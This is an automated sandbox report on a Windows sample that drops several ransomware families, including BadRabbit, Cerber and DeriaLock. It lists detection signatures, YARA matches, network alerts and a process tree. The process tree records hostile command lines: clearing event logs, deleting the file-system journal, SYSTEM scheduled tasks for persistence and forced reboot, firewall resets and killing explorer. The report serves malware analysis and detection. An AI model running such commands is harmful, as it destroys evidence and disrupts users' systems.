Windows Analysis Report
irH9zMhZub.exe

Overview

General Information

Sample Name: irH9zMhZub.exe
Analysis ID: 712619
MD5: 7d8f0e539e50eb545d094c50aab0ea9e
SHA1: 9368da690ace5328abc4461cd8322d78c1fdc290
SHA256: f9c5420c0f039a178f5495ecfb657f8da383624e0cf7f02c645fbdfa95e2e8b9
Tags: Cerber, exe, Ransomware

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected DeriaLock Ransomware
Yara detected Babuk Ransomware
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Multi AV Scanner detection for dropped file
Yara detected InfinityLock Ransomware
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Deletes keys related to Windows Defender
Deletes keys which are related to windows safe boot (disables safe mode boot)
Clears the journal log
Machine Learning detection for sample
Clears the windows event log
Contains functionality to change the wallpaper
Connects to many different private IPs (likely to spread or exploit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the windows firewall
Connects to many different private IPs via SMB (likely to spread or exploit)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Creates a start menu entry (Start Menu\Programs\Startup)
Checks for available system drives (often done to infect USB drives)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Enables security privileges
Uses taskkill to terminate processes
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information

Classification

  • System is w10x64
  • irH9zMhZub.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\irH9zMhZub.exe" MD5: 7D8F0E539E50EB545D094C50AAB0EA9E)
    • Endermanch@BadRabbit.exe (PID: 5660 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 5364 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 4112 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 1408 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 2364 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2224 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 5128 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2404 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • 5753.tmp (PID: 4948 cmdline: "C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928} MD5: 347AC3B6B791054DE3E5720A7144A977)
          • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 4152 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • wevtutil.exe (PID: 4996 cmdline: wevtutil cl Setup MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 60 cmdline: wevtutil cl System MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 5468 cmdline: wevtutil cl Security MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 2372 cmdline: wevtutil cl Application MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • fsutil.exe (PID: 7632 cmdline: fsutil usn deletejournal /D C: MD5: 140A43A2237D7D7497D4E0568B518B71)
        • cmd.exe (PID: 3500 cmdline: /c schtasks /Delete /F /TN drogon MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2564 cmdline: schtasks /Delete /F /TN drogon MD5: 15FF7D8324231381BAD48A052F85DF04)
    • Endermanch@BadRabbit.exe (PID: 5388 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 2212 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • Endermanch@Birele.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 5484 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@BadRabbit.exe (PID: 3140 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Birele.exe (PID: 4668 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 4500 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 5148 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
      • netsh.exe (PID: 3584 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 4812 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@BadRabbit.exe (PID: 5460 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 4688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 2852 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • Endermanch@Birele.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 3664 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 3592 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
    • Endermanch@DeriaLock.exe (PID: 3576 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
    • Endermanch@BadRabbit.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Birele.exe (PID: 272 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 3868 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 5456 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
    • Endermanch@DeriaLock.exe (PID: 5728 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
  • svchost.exe (PID: 5492 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5524 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5480 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cmd.exe (PID: 5420 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5356 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1268 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7664 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe | JoeSecurity_infinitylock | Yara detected InfinityLock Ransomware | Joe Security
    C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe | MALWARE_Win_InfinityLock | Detects InfinityLock ransomware | ditekSHen
    • 0x2c145:$s3: GenerateHWID
    • 0x2c2c3:$s4: CreateKey
    • 0x2c1b6:$d1: ProgrammFiles
    • 0x2c1ad:$d2: OneDrive
    • 0x2c184:$d3: ProgrammsX86
    • 0x2c1a4:$d4: UserDirs
    • 0x2c1dd:$d5: B_Drive
    • 0x2e834:$pdb1: F:\DESKTOP!\ChkDsk\ChkDsk\obj\
    • 0x2e846:$pdb2: \ChkDsk\obj\Debug\PremiereCrack.pdb
    C:\Windows\cscc.dat | INDICATOR_TOOL_ENC_DiskCryptor | Detect DiskCryptor open encryption solution that offers encryption of all disk partitions | ditekSHen
    • 0x2b3d8:$d1: \DosDevices\dcrypt
    • 0x2b488:$d2: $dcsys$_fail_%x
    • 0x2b468:$d3: %s\$DC_TRIM_%x$
    • 0x2b3b8:$d4: \Device\dcrypt
    • 0x2b420:$d5: %s\$dcsys$
    C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
    • 0x6114:$x3: C:\Windows\infpub.dat
    • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
    C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe | JoeSecurity_DeriaLock | Yara detected DeriaLock Ransomware | Joe Security
      Source | Rule | Description | Author | Strings
      00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp | cerber3 | Cerber3 | pekeinfo
      • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp | cerber3 | Cerber3 | pekeinfo
      • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp | sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 | Bad Rabbit Ransomware | Christiaan Beek
      • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
      • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
      • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
      • 0x1a452:$s3: If you have already got the password, please enter it below.
      • 0x1e5a2:$s3: If you have already got the password, please enter it below.
      • 0x20354:$s4: dispci.exe
      • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
      • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
      • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
      • 0x13800:$s7: Enter password#1:
      • 0x136be:$s8: Enter password#2:
      • 0x13478:$s9: C:\Windows\cscc.dat
      • 0x13988:$s10: schtasks /Delete /F /TN %ws
      • 0x1a490:$s11: Password#1:
      • 0x1e5e0:$s11: Password#1:
      • 0x133e0:$s12: \AppData
      • 0x13698:$s13: Readme.txt
      • 0x1379a:$s14: Disk decryption completed
      • 0x13712:$s15: Files decryption completed
      • 0x202fc:$s16: http://diskcryptor.net/
      • 0x1a27d:$s17: Your personal installation key#1:
      0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp | cerber3 | Cerber3 | pekeinfo
      • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp | Cerber | Cerber Payload | kevoreilly
      • 0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
      Source | Rule | Description | Author | Strings
      32.2.Endermanch@BadRabbit.exe.1320000.1.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
      • 0x6114:$x3: C:\Windows\infpub.dat
      • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
      49.0.Endermanch@BadRabbit.exe.1320000.0.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
      • 0x6114:$x3: C:\Windows\infpub.dat
      • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
      40.2.Endermanch@Cerber5.exe.4df0000.2.unpack | Cerber | Cerber Payload | kevoreilly
      • 0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
      40.2.Endermanch@Cerber5.exe.400000.0.raw.unpack | Cerber | Cerber Payload | kevoreilly
      • 0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
      10.0.Endermanch@BadRabbit.exe.1320000.2.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
      • 0x6114:$x3: C:\Windows\infpub.dat
      • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws

      Data Obfuscation

      Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, ParentProcessId: 5660, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 5364, ProcessName: rundll32.exe
      Timestamp: 09/29/22-14:52:28.844656
      Source IP: 192.168.2.6
      Destination IP: 162.55.0.137
      SID: 2824087
      Source Port: 49767
      Destination Port: 80
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 09/29/22-14:50:24.513544
      Source IP: 192.168.2.6
      Destination IP: 93.107.12.0
      SID: 2023613
      Source Port: 59083
      Destination Port: 6893
      Protocol: UDP
      Classtype: A Network Trojan was detected

      AV Detection

      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exeAvira: detection malicious, Label: TR/Sirery.A
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeAvira: detection malicious, Label: HEUR/AGEN.1227089
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exeAvira: detection malicious, Label: TR/Ransom.pfnaw
      Source: C:\Windows\dispci.exeAvira: detection malicious, Label: TR/Diskcoder.12354
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exeAvira: detection malicious, Label: HEUR/AGEN.1240493
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeAvira: detection malicious, Label: TR/BAS.Samca.fyzpg
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeAvira: detection malicious, Label: TR/Genasom.wzara
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeAvira: detection malicious, Label: TR/Diskcoder.ezxim
      Source: C:\Users\user\AppData\Local\Temp\Fantom.exeAvira: detection malicious, Label: TR/AD.HiddenTear.huakh
      Source: irH9zMhZub.exeReversingLabs: Detection: 66%
      Source: irH9zMhZub.exeVirustotal: Detection: 63%
      Source: irH9zMhZub.exeMetadefender: Detection: 27%
      Source: irH9zMhZub.exeAvira: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeReversingLabs: Detection: 92%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeMetadefender: Detection: 82%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeReversingLabs: Detection: 86%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeMetadefender: Detection: 77%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeReversingLabs: Detection: 90%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeMetadefender: Detection: 75%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeReversingLabs: Detection: 92%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeMetadefender: Detection: 68%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exeReversingLabs: Detection: 85%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exeMetadefender: Detection: 60%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exeReversingLabs: Detection: 96%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exeMetadefender: Detection: 86%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exeReversingLabs: Detection: 90%
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exeMetadefender: Detection: 72%
      Source: C:\Users\user\AppData\Local\Temp\Fantom.exeReversingLabs: Detection: 87%
      Source: C:\Users\user\AppData\Local\Temp\Fantom.exeMetadefender: Detection: 65%
      Source: C:\Windows\dispci.exeReversingLabs: Detection: 96%
      Source: C:\Windows\dispci.exeMetadefender: Detection: 85%
      Source: irH9zMhZub.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exeJoe Sandbox ML: detected
      Source: C:\Windows\dispci.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Fantom.exeJoe Sandbox ML: detected
      Source: 32.2.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.3.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 38.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.3.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.3.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 55.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 4.2.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 40.2.Endermanch@Cerber5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 14.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.3.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 8.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 38.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 8.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 8.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 14.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 14.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 14.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 19.2.Endermanch@Cerber5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 10.2.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.1.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 38.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 1.0.Endermanch@BadRabbit.exe.1320000.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 55.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 32.0.Endermanch@BadRabbit.exe.1320000.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 38.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 10.0.Endermanch@BadRabbit.exe.1320000.3.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 49.2.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 55.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 8.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 58.2.Endermanch@Cerber5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 4.0.Endermanch@BadRabbit.exe.1320000.2.unpackAvira: Label: TR/ATRAPS.Gen
